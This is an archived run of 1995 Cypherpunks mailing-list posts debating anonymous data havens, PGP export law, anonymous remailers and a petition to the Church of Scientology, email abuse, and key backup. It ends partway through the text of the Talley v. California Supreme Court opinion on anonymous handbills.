MacPGPv262 iQCVAwUBLxzBawSQkem38rwFAQE8qAP8DODqlKop7fo7zwWYDCYEbygxr8PT9yv7 w9CNqyPC57zufrjZJurg3twx91Uqf9fJ3mEGHGrDKfwqXu3A4RPo0E+BAJCyUS61 8Tqj80oM8TE7Nmr04pEBZhI5CgTq5lAjdTT5m7ndlP25IkJPl+W/eEdGnyKrqcXr I8PL8jV2rU8= =wEur -----END PGP SIGNATURE----- -- Lucky Green PGP encrypted mail preferred. From tcmay at netcom.com Tue Jan 17 23:30:20 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 17 Jan 95 23:30:20 PST Subject: Known data havens for pirates? Doubtful In-Reply-To: Message-ID: <199501180700.XAA14684@netcom2.netcom.com> The comments about data havens have been interesting to read. Being the analytic-retentive type, I like to view things as tables and graphs, of such things as: who knows location (nobody, some, everybody) vs. types of data supported, for example. But I won't make such a table here, now. [Note on my responses. Netcom is not accepting mail connections, so Cypherpunk mail basically doesn't arrive from the early morning to very late in the evening. This has to do with toad not using "MX mail records," as near as we could figure out. Please don't send suggestions, as I can't get either toad or Netcom changed. I merely point this out to explain why I basically am out of the debate during the day. The information highway is becoming a dirt road.] I mainly agree with Rishab's point: the idea of a known, fixed location that carries Infocalypse material is deeply flawed. Data havens just won't be in known locations, at least not primarily. While I found Bruce Sterling's "data havens" in the Caribbean, Africa, and Asia interesting and provocative, they made no sense as viable, stable entities. No site which is _known_ to be a Warez site, a bootleg Nazi medical data site, a copyright violation haven, etc., will last for long. Whether knocked out as a result of a U.N. Resolution (infinitely easier than zapping Saddam), or sabotaged the way the French SDECE hit the "Rainbow Warrior," or merely subverted at ground level, the site cannot last. "The Center cannot hold." Fortunately, there is no reason for data havens to be in fixed locations. Or in traceable, identifiable locations. My BlackNet thought experiment was much more than a mere Gedanken experiment: as many of you learned, it was/is a real key, and 2-way communication has happened. Of course, you mostly all know I was the instigator (and those who don't haven't followed the debate and/or haven't read the Cyphernomicon section on BlackNet). rishab at dxm.ernet.in wrote: > I suppose you _are_ aware that the US has threatened China with punitive > duties on $100 BILLION dollars worth of trade, and that China has started > holding some show trials (without shutting down its state-owned CD-piracy > factories). It's not going to be easy to find a country more willing and > able to ignore international copyright law (Berne Convention etc) than China; > however, despite howls of protest even China is likely to knuckle down > eventually. What may be likely is distributed piracy markets, such as ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > described in Tim's BlackNet spoof. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Yes, this is the way to go. The data havens have a location that is a public key in cyberspace. Think of it as one entity placing an anonymous, untraceable classified ad in a newspaper, readable by many, and others placing ads in response. A two-way communication channel is thus opened up, without regard for the physical location of each, the nature of the communication, the data to be transferred, etc. All of that is just detail. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From lmccarth at ducie.cs.umass.edu Wed Jan 18 00:00:22 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 18 Jan 95 00:00:22 PST Subject: EE Times on PRZ Message-ID: <199501180805.DAA18028@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Hal quotes the 1/16/95 EE Times: > "Zimmermann is not in danger of being indicted > for willfully exporting PGP. Rather, the U.S. attorney's office, here, is > considering charging him for making PGP available in such a manner that > it could be exported by a third party." This is very odd indeed. It reminds me of the "like-a-book" shrink-wrap software license agreements. Did they expect PRZ to run PGP solely on a single computer at home, and allow house guests to use it ? Copies of a piece of software can obviously be handled in any fashion by their possessors. I can't conceive of a way to make software available without distributing copies, other than allowing global execute permission (but not read permission) for a copy running on an *ahem* "unhackable" server. I find it difficult to believe, however, that arms export control statutes written for munitions hardware mandate this extreme restriction on access. Such laws would turn the export-controlled section of a gun store into an analogue of the reference section of a library -- "you can use it here, but you can't check it out". People using strong crypto remotely are forced to trust the remote crypto server to some extent, which tends to defeat the whole purpose of the exercise. It also starts to sound like a model for GAK.... :[ Anyone have an email address for someone at EE Times ? -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxzKkmf7YYibNzjpAQG+XwQAm5385MOcsjY76auUIe24uTQMRhZ8u2Yy rIuGBdj/B4C1K9WRMhIWq1i1gMv4mBAF8FWfd/tPRfq5N49TgIyGY82SPmUczYgU N/w6unO5HpnpzcvCGq368r/2UpS4UndLVwZEik0JIsIvjm9+Pevz5SZA1Z+O1piI lJFQQgV3sck= =nYey - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxzLrCoZzwIn1bdtAQGZKQGA1gpT6cXWN4pAwlRw2vOJJYCZvruyBde2 BOATJ32Sg19wwUXUk7z7A8VnVNU59twG =kjXQ -----END PGP SIGNATURE----- From skaplin at mirage.skypoint.com Wed Jan 18 00:43:41 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 18 Jan 95 00:43:41 PST Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought this was topical and VERY much of interest here. Sam - -------- Forwarded message -------- Newsgroups: alt.2600,alt.activism,alt.atheism,alt.censorship,alt.clearing.technology,alt.conspiracy, Date: Tue, 17 Jan 1995 15:23:44 GMT From: noring at netcom.com (Jon Noring) Subject: --> A Net-Petition to the Church of Scientology, Please Read [Hurry! Signature tallying for this petition EXPIRES February 6, 1995! Be sure to send your signature to cos-petition at netcom.com -- see the instructions after the petition statement. The petition statement begins 68 lines down from here.] Following this short introductory section is the petition statement to the Church of Scientology and affiliated organizations regarding their recent legal actions which have very serious ramifications for freedom of expression on Usenet and the Internet. It is somewhat long, but the length is necessary to give you sufficient information to make an informed decision. I want to stress that this petition is NOT focused on the beliefs or practices of the Church of Scientology. Rather, it is focused on their recent legal action, and this petition demands that they reconsider these actions for the good of everyone, including themselves. It should also be made *very clear* that none of us should ever condone or support any action which would censor or inhibit Scientology supporters from being able to express their views and opinions on Usenet, the Internet, and all other electronic forums, provided they do so in accordance with accepted netiquette, as all of us should. I encourage you to read the petition statement carefully, and if you agree with all three demands (given near the end of the statement), to then "sign" it via Internet e-mail using the instructions which follow the statement. Do follow EXACTLY the directions on how to "sign"; they are not difficult. Note that only those with valid Internet-accessible e-mail addresses can sign this petition. Fortunately, nearly all on-line services, such as CompuServe, and many BBS, do offer Internet e-mail acess, so just about anybody who is electronically hooked up to some network in the world can sign this petition. If you are not sure what your Internet e-mail address is, ask your site's sysadmin/sysop for assistance. Please do upload this petition statement as soon as possible to any BBS and on-line service in your area. If you have access to one of the major national on-line services such as CompuServe, Prodigy, AOL, etc., do try to upload it there. We are trying to get at least 5000 signatures. Even more signatures are entirely possible if we each put in a little effort to inform others, such as friends and coworkers, about the importance of this petition to electronic freedom of expression. I plan to make the signatures publicly available on or shortly after February 7, 1995, and will also submit them to the Church of Scientology as well as the newsmedia. Important Note: Because of the unusual sensitivity of this petition, I will not submit nor reveal the e-mail signatures IF the total number of validated signatures is less than 1000. This offer is made for those who would feel "exposed" if their name appears on a list with a small number of signatures. I fully expect to surpass 1000 signatures in one or two days! In addition, unlike past net-petitions, providing one's full name in addition to one's e-mail address will be optional. However, I highly encourage you to be brave and include your full name, as all petitions are traditionally considered more "binding" if real names are used. I will tally the number of signatures with and without full names when the petition drive ends February 6, 1995. Thank you for your signature! Let's all do our part to keep all electronic networks free and open for everybody. Jon Noring (Disclaimer: Nothing written in this petition transmittal should be construed as legal advice. If you need legal assistance or advice concerning any of the issues brought up in this document, contact a qualified attorney.) **************** Beginning of Petition Statement ******************** TO: The Church of Scientology, The Religious Technology Center, Bridge Publications, Inc., Office of Special Affairs, and all other affiliated organizations, divisions and corporations of the Church of Scientology We, the undersigned, are disturbed by your recent legal attempts to stifle the free flow of information on the Internet and Usenet. Specifically, you have 1) threatened legal action against several automated anonymous remailers unless they filter out *all* e-mail targeted to the legitimate Usenet newsgroups alt.religion.scientology (a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all points of view about Scientology, both pro and con, are welcome, and 2) demanded and actually attempted the removal of a.r.s. in gross defiance of accepted Usenet practice and netiquette. Concerning 1), since nearly all (if not all) of the e-mail sent to a.r.s. and a.c.t. via the remailers is legitimate and originates from individuals who sincerely believe they need to post anonymously because of the nature of discussion, your demand, if implemented, would prevent these individuals from freely expressing their views in the proper forum. Freedom of expression is internationally recognized as one of the most important and sacred of basic human rights, and your demands fly in the face of this recognition. Your second demand, removing a.r.s., would go even further in inhibiting freedom of expression on all electronic networks. It is a *very* serious matter to attempt to remove forums of free expression. Your primary argument for issuing these legal threats, according to your statements, are that some people (the "perpetrators") have knowingly posted *alleged* (meaning not yet demonstrated in a court of law) Church of Scientology copyrighted and trade secret material to a.r.s. and a.c.t., sometimes using the anonymous remailers as the carrier (because of the common carrier-like nature of anonymous remailers, the administrators of the remailers have no knowledge of such activity taking place). Though we do not condone making copyrighted material available on any electronic network without the permission of the copyright holder, your specific legal threats are short-sighted, perceived to be mean-spirited, ineffective, and are on tenuous legal grounds because 1) It won't stop those who are determined to make available alleged copyrighted materials on electronic networks. They will find other avenues on the electronic networks to do so. Only prosecuting the actual perpetrators will deter this alleged illegal activity. 2) Your demands, if met, will have the effect of leading to significant stifling of free speech and the exchange of information on all electronic networks which, if not illegal in some jurisdictions, goes against all accepted conventions of a free and open society, 3) You have not stated, nor is there any indication, that you intend to work in a cooperative manner with legitimate law-enforcement agencies, the courts, and/or the Internet to locate and prosecute the perpetrators of the *alleged* copyright violations in the countries they originated. Thus, your threats are being construed, rightly or wrongly, by most on the electronic networks as an attempt to stifle free discussion on Scientology rather than trying to locate and prosecute the perpetrators of the *alleged* copyright and trade secret violations. With respect to the attempted removal of the newsgroup a.r.s., you also stated that the word 'scientology' is trademarked and thus the name a.r.s. infringes on such trademark. This is appallingly ludicrous based on past case law of similar situations, as well as your implicit acknowledgement of the legitimacy of a.r.s. by allowing Church of Scientology approved information to be posted to it by your supporters, and possibly with your knowledge and/or approval, ever since it was created July 1991, almost 3.5 years ago. Therefore, we, the undersigned, make the following demands. 1) Regarding your charges of copyright violation over electronic networks: You will cease all legal action, now and in the future, against any person, company, organization, etc., associated or affiliated in any way with all electronic networks, including the Internet, except that action which is necessary to locate and prosecute the perpetrators (as previously defined) of alleged copyright and trade secret violations, and other activity in violation of law, and *only* in full cooperation with legitimate law-enforcement agencies and/or the courts. 2) Regarding your trademark challenge of the Usenet newsgroup alt.religion.scientology: You will cease all legal action, now and in the future, to remove any Usenet newsgroup, BBS forum, mailing list or other similar forum of public exchange of information over any electronic network, or to inhibit in any way the flow of information to and from these forums. This includes, for example, ceasing all legal action demanding a) the removal of the Usenet newsgroup alt.religion.scientology and b) that anonymous remailers add filters as previously described. 3) You will publicly and officially state a) That you support the existence of free and open forums on all electronic networks to discuss Scientology from all perspectives and points of view (which includes yours), and b) That you do not support nor condone attempts by any entity to electronically censor, remove, obstruct, or tamper with any electronic communication except when allowed by a valid court order. If you outright reject or refuse to even discuss these demands in a good faith manner on Usenet, we have no other option but to consider such rejection or refusal to even discuss to be an act of hostility by the Church of Scientology towards the users of all electronic networks and forums, including the Internet. We are certain you do not want this, and we do not want it either, so we offer to work with you any way we can with regard to any legitimate demands you may have concerning alleged copyright violation(s) and other illegal activity. However, any attempts by you of any kind to tamper or in any manner restrict the free flow of information (other than that *specifically* restricted by law -- and *only* that) on any electronic network is totally unacceptable and will not be tolerated for the reasons stated above. Signed, ******************* End of Petition Statement *********************** ====================================== Instructions for Signing This Petition ====================================== It must first be noted that this is a petition, not a vote. By "signing" it you agree with *all* the demands of the petition statement. If you do not agree with all the demands, then your only recourse is to not sign it. In addition, all e-mail signatures will be submitted to the Church of Scientology as well as the newsmedia provided more than 1000 validated signatures are obtained. Including your full name is optional, but very highly encouraged as that would add to the effectiveness of the petition. Signing via an anonymous remailer is discouraged, but not forbidden, as an attempt will be made to separately tally signatures from anonymous remailers. Signing this petition is not hard, but to make sure your signature is not lost or miscounted, please follow these directions exactly: 1) Prepare an e-mail message. In the main body (NOT the Subject line) of your e-mail include the ONE-LINE statement: SIGNED You need not include the "<" and ">" characters. 'SIGNED' should be capitalized. As stated above, your full name is optional, but highly recommended. If you do supply your name, please don't use a pseudonym or nickname, or your first name -- it's better to just leave it blank if it's not your full and real name. *************************************** Example: My e-mail signature would be: SIGNED noring at netcom.com Jon E. Noring *************************************** 2) Please DON'T include a copy of this petition, nor any other text, in your e-mail message. If you have comments to make, send e-mail to me personally, and NOT to the special petition e-mail signature address. 3) Send your e-mail message containing your signature to the following Internet e-mail address and NOT to me: =========================== cos-petition at netcom.com =========================== 4) Within a few days of receipt of your signature, an automated acknowledgment will be e-mailed to you for e-mail address verification purposes. You do not need to respond or reply to this acknowledgement when you receive it. Thank you for signing this petition! Jon Noring (p.s., send your signature to cos-petition at netcom.com) - -- OmniMedia | The Electronic Bookstore. Come in and browse! Two 1312 Carlton Place | locations: ftp.netcom.com /pub/Om/OmniMedia/books Livermore, CA 94550 | and ftp.awa.com /pub/softlock/pc/products/OmniMedia 510-294-8153 | E-book publishing service follows NWU recommendations. - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A skydiving school is one in which you MUST be a dropout to graduate -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxzTPslnXxBRSgfNAQFJuwf9H7Y6hDvywsw5avIiFba+P32Ftbd9KibP c4SBKp77jEiEZZ3r5LjBNttXDp4muci30cpiazIi/2p3ksFN6W1WCSs9/Uu1l1cO 8r54Am78JKuRZy+TENcLaQAiOyRc0Yxrmp+G8SBCeM+wwlEP8/OHmcnoFxhFYi27 TWMdyFa4j/ethsPt/6J5R4g5nfdVo3Y3rdxdkofNoORzh9jj12lZyn3xMUT9jSag 4mFEZTTQb8aeRwKVOZAqS1J5RxQBxuVyYaNBz9VE54MS2X/Ix81WUGA0IgkY/ZjW EWdlDjxtl0OpjcXa2viis1fD29EYaDXSgogoTWhtmKZCdOjB0QgKiw== =TwRa -----END PGP SIGNATURE----- From rrothenb at libws4.ic.sunysb.edu Wed Jan 18 03:27:49 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Wed, 18 Jan 95 03:27:49 PST Subject: Known data havens for pirates? Doubtful In-Reply-To: <199501180700.XAA14684@netcom2.netcom.com> Message-ID: <9501181127.AA24624@toad.com> > > The comments about data havens have been interesting to read. Being [ .. ] > Yes, this is the way to go. The data havens have a location that is a > public key in cyberspace. Think of it as one entity placing an > anonymous, untraceable classified ad in a newspaper, readable by many, > and others placing ads in response. A two-way communication channel is > thus opened up, without regard for the physical location of each, the > nature of the communication, the data to be transferred, etc. > > All of that is just detail. Hmmm... then why use a data haven at all? Split the file into small pieces, encrypt each and post each piece in a newsgroups (the pieces may even be posted as small garbles of data in sigs?). When you need to recover the file checksites which archive those newsgroups. Just a thought. It's probably quite doable for small files. Another idea: use encryption/secret sharing combined with steganography and upload copies of the said files to various ftp-sties or BBS's. (It may be that this is more secure than data havens, since few SysAdmins would bother checking for steganographically hidden files...) > > --Tim May Rob From djw at pentagon.io.com Wed Jan 18 05:22:05 1995 From: djw at pentagon.io.com (Duncan) Date: Wed, 18 Jan 95 05:22:05 PST Subject: 40bit Encryption : Adequate or sadly lacking ? In-Reply-To: <9501172240.AA05908@warp.mcom.com> Message-ID: <199501181321.HAA04672@pentagon.io.com> >> Marc, isn't it possible (legally) to deliver products with a replaceble >> encryption library (dll). Delivery with a 40-bit key DLL. The user has >> the option to install a dll with a different keysize. Somewhat like >> winsock.... > > >Actually, it's probably worse than you think: > >There are govt's out there that won't let you import code that is >"encryption ready". You must prove that your software is tamper proof >before it can be imported, and tamper proofing means that you can't >bolt on security. Also, I believe the export laws disallow "plug in" >security in the US... > >The crypto legal world sucks. Could you clarify the export restriction on "plug and play" encryption ready products? I am about to embark on a project that I want to be distributed freely that would be designed around a generic encryption intereface that I would wrap around a real encryption core such as PGP,etc. I wanted to include a BS encryption in the freely distributable package to prevent export woes. The project is in design stages now and I don't need this additional headache. djw ------------------------------------------------------------- Duncan J Watson djw at io.com "Sig Quote goes here" duncan at hasp.com From joelm at eskimo.com Wed Jan 18 07:21:06 1995 From: joelm at eskimo.com (Joel McNamara) Date: Wed, 18 Jan 95 07:21:06 PST Subject: TEMPEST Message-ID: <199501181520.AB24570@mail.eskimo.com> I know, it's a little bit outside the normal realm of discussion, but... The Cyphernomicon talks about a proposed, early Cypherpunk project that dealt with TEMPEST/VanEck monitoring. Did anyone carry this out beyond the idea stage? All I ever seem to see is "theory" and "hear-say" on this topic (and the original VanEck article appears dated and incomplete). I noticed the Consumertronics (John Williams in Alamogordo, New Mexico) catalog has an assembled device that will work with EGA to SVGA monitors. $3,995 seems a bit pricey though (or is it). Has anyone had dealings with Consumertronics in the past? Replies directly back to me if this is a waste of bandwidth for the rest of the list. Thanks... Joel McNamara joelm at eskimo.com - finger for PGP key From jya at pipeline.com Wed Jan 18 07:30:26 1995 From: jya at pipeline.com (John Young) Date: Wed, 18 Jan 95 07:30:26 PST Subject: NYT on Prodigy Web and Checkfree Suit Message-ID: <199501181529.KAA07432@pipe2.pipeline.com> Peter Lewis writes today on Prodigy's new offering of World Wide Web service. For email copy send blank message with subject: PRO_www Saul Hansell writes today on Checkfree's new patent and suit against National Payment Clearing House, a subsidiary of Intuit. For email copy send blank message with subject: CHK_sue For twin use subject: PRO_CHK From eric at remailer.net Wed Jan 18 07:44:09 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 07:44:09 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <199501181543.HAA08161@largo.remailer.net> From: Michael Handler [automatically split and redistribute] If the authorities attempt to indict you for possessing illegal information / kiddie porn / whatnot, they have to prove that you interfered with the automatic redistribution process and examined the contents of the submission. If you in fact did not look at the submission, they would have a difficult time doing so. This is exactly the right kind of approach, I think. It's more expensive to implement than a readable-reject filter, but then I expect a continuum of services. The key legal point is "interfered with the automatic redistribution process". If an operator can point to those fixed properties of a system which keep the operator ignorant, an opponent trying to prove otherwise will have difficult time. Eric From eric at remailer.net Wed Jan 18 07:54:12 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 07:54:12 PST Subject: (none) In-Reply-To: Message-ID: <199501181554.HAA08177@largo.remailer.net> From: Brian Beattie I disagree, one can use e-mail to steal. E-mail consumes resources, resources for which the sender may have no right to use. It's not theft if there's no direct benefit to the actor. It does consume resources, there's no argument about that. Note, however, that the scope of any such resource use is with the message as a bit sequence; no meaning or interpretation of the content is even relevant. That is, the resource use does not relate to the email as communication, merely as a technical operation. The question remains whether such resource use can ever be considered unauthorized. Certainly it's impolite; that's not at issue. I argue that if you hook your machine up to the Internet, you've implicitly authorized people to send you packets -- as many as they want and of whatever nature as they want. No service provision I've ever seen gives any recourse to the end user against the provider for "bad" packets. I also think this is the one great flaw in the design of the Internet; namely, that the sender has all the control over what packets flow over the net. A receiver can ask for a slowdown or cessation, but there's no obligation to do so. This will be, if anything, the limiting factor in scalability of the internet. Eric From perry at imsi.com Wed Jan 18 08:03:30 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 18 Jan 95 08:03:30 PST Subject: (none) In-Reply-To: <199501181554.HAA08177@largo.remailer.net> Message-ID: <9501181603.AA01635@snark.imsi.com> Eric Hughes says: > I argue that if you hook your machine up to the Internet, you've > implicitly authorized people to send you packets -- as many as they > want and of whatever nature as they want. No service provision I've > ever seen gives any recourse to the end user against the provider for > "bad" packets. Be that as it may, people HAVE been kicked off for mischief like forging routing packets -- and if someone started hosing me down with any one of several really nasty packet based attacks I'm familiar with I would expect action to be taken against them. Remember that degree is important in such instances. You are allowed to shine a flashlight at your neighbor's house -- you aren't allowed to shine a fifty megawatt laser. Degree counts. > I also think this is the one great flaw in the design of the Internet; > namely, that the sender has all the control over what packets flow > over the net. A receiver can ask for a slowdown or cessation, but > there's no obligation to do so. This will be, if anything, the > limiting factor in scalability of the internet. I doubt it. It really hasn't proved to be an actual problem thus far. If anything, the limiting factor on scalability is the fact that the net has no locality of reference, which is making routing design harder and harder. Routing is currently THE big unsolved problem on the net -- something outsiders to the IETF rarely suspect, because the engineers have been faking it so well for so long. Unfortunately, all the good solutions to the routing problem are mathematically intractable -- and the practical ones are leading to bad potential long term problems... Perry From eric at remailer.net Wed Jan 18 08:07:43 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 08:07:43 PST Subject: (none) In-Reply-To: <9501172027.AA24378@firefly.prairienet.org> Message-ID: <199501181607.IAA08201@largo.remailer.net> From: jalicqui at prairienet.org (Jeff Licquia) I'm sure that when your hypothetical remailer comes up and I decide to spam you with your own words (now I wouldn't do that, now would I? ;-), your sysadmin will be comforted by knowing that it's only ones and zeros filling his hard disk. Why sendmail doesn't have anti-spam protection at this point is beyond me. Denial of email service to one user should not deny service to all others. I consider broken any email system that crashes a machine because of a disk partition filling. When your email provider gave you an account, was there an agreement as to how much mail you could receive? If there wasn't, that provider has no good reason to complain if you receive as much email as possible. Merely because some else decided to send it to you does not relieve a provider who has agreed to deliver all mail of that obligation. Moral: If you operate an email service, don't offer unlimited fixed price email. In the real world, however, there will always be problems with "acceptable use" and "abuse", along with the additional problems with establishing policy and so on. "Acceptable use" is shorthand for "It's a little rickety, please don't play hard." That is, the technical means to limit the consequences of abuse were not developed, because everyone was willing to play nice. This doesn't scale, and it will have to be fixed before everyone will put their home computer directly on the net. Eric From eric at remailer.net Wed Jan 18 08:13:26 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 08:13:26 PST Subject: Key backup (was: How do I know . ..) In-Reply-To: <199501180601.BAA16566@bb.hks.net> Message-ID: <199501181613.IAA08209@largo.remailer.net> From: "Dr. D.C. Williams" The "spread spectrum" approach might well be indicated for some life-or- death key security matters, but the vast majority of PGP users probably don't need or want to play Spy vs. Spy with their friends to backup keys. You use your friends now because off-site storage facilities are not yet available. The software for distributed remote backup has yet to make this operation transparent. I recognize that you can't just leave your private keyring lying around [physical storage mentioned] I suspect that most private keys in the future will be held in PCMCIA cards (initially) and then their smaller replacements. Backing up a private key to these allows use of a safe deposit box. If it's still "passphrase-protected", an attacker would a) have to know what to look for For scalability, most people will use some standard method, whatever it is. This limits the search space of an opponent. Eric From lethin at ai.mit.edu Wed Jan 18 08:47:35 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Wed, 18 Jan 95 08:47:35 PST Subject: [pagre@weber.ucsd.edu: Supreme Court decision on anonymity] Message-ID: <9501181647.AA13819@toast> Return-Path: Resent-Date: Tue, 17 Jan 1995 18:00:48 -0800 Date: Tue, 17 Jan 1995 18:00:02 -0800 From: Phil Agre To: rre at weber.ucsd.edu Subject: Supreme Court decision on anonymity Resent-From: rre at weber.ucsd.edu Reply-To: rre-maintainers at weber.ucsd.edu X-Url: http://communication.ucsd.edu/pagre/rre.html X-Mailing-List: archive/latest/534 X-Loop: rre at weber.ucsd.edu Precedence: list Resent-Sender: rre-request at weber.ucsd.edu Dave Banisar from the Electronic Privacy Information Center sent me the enclosed text of the US Supreme Court's decision denying the constitutionality of laws banning anonymous leaflets. This decision has an obvious relevance to current debates about regulating anonymous messages on the Internet. Date: Tue, 17 Jan 1995 16:17:44 EST From: Dave Banisar Subject: anonymity [...] TALLEY v. CALIFORNIA SUPREME COURT OF THE UNITED STATES 362 U.S. 60 January 13-14, 1960, Argued March 7, 1960, Decided Certiorari to the Appellate Department of the Superior Court of California, Los Angeles County. 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed. A. L. Wirin and Hugh R. Manes argued the cause for petitioner. With them on the brief was Fred Okrand. Philip E. Grey argued the cause for respondent. With him on the brief was Roger Arnebergh. Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed a brief for the American Jewish Congress, as amicus curiae, urging reversal. Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan, Whittaker, Stewart MR. JUSTICE BLACK delivered the opinion of the Court. The question presented here is whether the provisions of a Los Angeles City ordinance restricting the distribution of handbills "abridge the freedom of speech and of the press secured against state invasion by the Fourteenth Amendment of the Constitution." n1 The ordinance, @ 28.06 of the Municipal Code of the City of Los Angeles, provides: "No person shall distribute any hand-bill in any place under any circumstances, which does not have printed on the cover, or the face thereof, the name and address of the following: "(a) The person who printed, wrote, compiled or manufactured the same. "(b) The person who caused the same to be distributed; provided, however, that in the case of a fictitious person or club, in addition to such fictitious name, the true names and addresses of the owners, managers or agents of the person sponsoring said hand-bill shall also appear thereon." The petitioner was arrested and tried in a Los Angeles Municipal Court for violating this ordinance. It was stipulated that the petitioner had distributed handbills in Los Angeles, and two of them were presented in evidence. Each had printed on it the following: National Consumers Mobilization, Box 6533, Los Angeles 55, Calif. PLeasant 9-1576. The handbills urged readers to help the organization carry on a boycott against certain merchants and businessmen, whose names were given, on the ground that, as one set of handbills said, they carried products of "manufacturers who will not offer equal employment opportunities to Negroes, Mexicans, and Orientals." There also appeared a blank, which, if signed, would request enrollment of the signer as a "member of National Consumers Mobilization," and which was preceded by a statement that "I believe that every man should have an equal opportunity for employment no matter what his race, religion, or place of birth." The Municipal Court held that the information printed on the handbills did not meet the requirements of the ordinance, found the petitioner guilty as charged, and fined him $ 10. The Appellate Department of the Superior Court of the County of Los Angeles affirmed the conviction, rejecting petitioner's contention, timely made in both state courts, that the ordinance invaded his freedom of speech and press in violation of the Fourteenth and First Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp. 797, 332 P. 2d 447. Since this was the highest state court available to petitioner, we granted certiorari to consider this constitutional contention. 360 U.S. 928. In Lovell v. Griffin, 303 U.S. 444, we held void on its face an ordinance that comprehensively forbade any distribution of literature at any time or place in Griffin, Georgia, without a license. Pamphlets and leaflets, it was pointed out, "have been historic weapons in the defense of liberty" n3 and enforcement of the Griffin ordinance "would restore the system of license and censorship in its baldest form." Id., at 452. A year later we had before us four ordinances each forbidding distribution of leaflets -- one in Irvington, New Jersey, one in Los Angeles, California, one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. Schneider v. State, 308 U.S. 147. Efforts were made to distinguish these four ordinances from the one held void in the Griffin case. The chief grounds urged for distinction were that the four ordinances had been passed to prevent either frauds, disorder, or littering, according to the records in these cases, and another ground urged was that two of the ordinances applied only to certain city areas. This Court refused to uphold the four ordinances on those grounds pointing out that there were other ways to accomplish these legitimate aims without abridging freedom of speech and press. Frauds, street littering and disorderly conduct could be denounced and punished as offenses, the Court said. Several years later we followed the Griffin and Schneider cases in striking down a Dallas, Texas, ordinance which was applied to prohibit the dissemination of information by the distribution of handbills. We said that although a city could punish any person for conduct on the streets if he violates a valid law, "one who is rightfully on a street . . . carries with him there as elsewhere the constitutional right to express his views in an orderly fashion . . . by handbills and literature as well as by the spoken word." Jamison v. Texas, 318 U.S. 413, 416. The broad ordinance now before us, barring distribution of "any hand-bill in any place under any circumstances," n4 falls precisely under the ban of our prior cases unless this ordinance is saved by the qualification that handbills can be distributed if they have printed on them the names and addresses of the persons who prepared, distributed or sponsored them. For, as in Griffin, the ordinance here is not limited to handbills whose content is "obscene or offensive to public morals or that advocates unlawful conduct." n5 Counsel has urged that this ordinance is aimed at providing a way to identify those responsible for fraud, false advertising and libel. Yet the ordinance is in no manner so limited, nor have we been referred to any legislative history indicating such a purpose. Therefore we do not pass on the validity of an ordinance limited to prevent these or any other supposed evils. This ordinance simply bars all handbills under all circumstances anywhere that do not have the names and addresses printed on them in the place the ordinance requires. There can be no doubt that such an identification requirement would tend to restrict freedom to distribute information and thereby freedom of expression. "Liberty of circulating is as essential to that freedom as liberty of publishing; indeed, without the circulation, the publication would be of little value." Lovell v. Griffin, 303 U.S., at 452. Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all. The obnoxious press licensing law of England, which was also enforced on the Colonies was due in part to the knowledge that exposure of the names of printers, writers and distributors would lessen the circulation of literature critical of the government. The old seditious libel cases in England show the lengths to which government had to go to find out who was responsible for books that were obnoxious to the rulers. John Lilburne was whipped, pilloried and fined for refusing to answer questions designed to get evidence to convict him or someone else for the secret distribution of books in England. Two Puritan Ministers, John Penry and John Udal, were sentenced to death on charges that they were responsible for writing, printing or publishing books. n6 Before the Revolutionary War colonial patriots frequently had to conceal their authorship or distribution of literature that easily could have brought down on them prosecutions by English-controlled courts. Along about that time the Letters of Junius were written and the identity of their author is unknown to this day. n7 Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes. We have recently had occasion to hold in two cases that there are times and circumstances when States may not compel members of groups engaged in the dissemination of ideas to be publicly identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 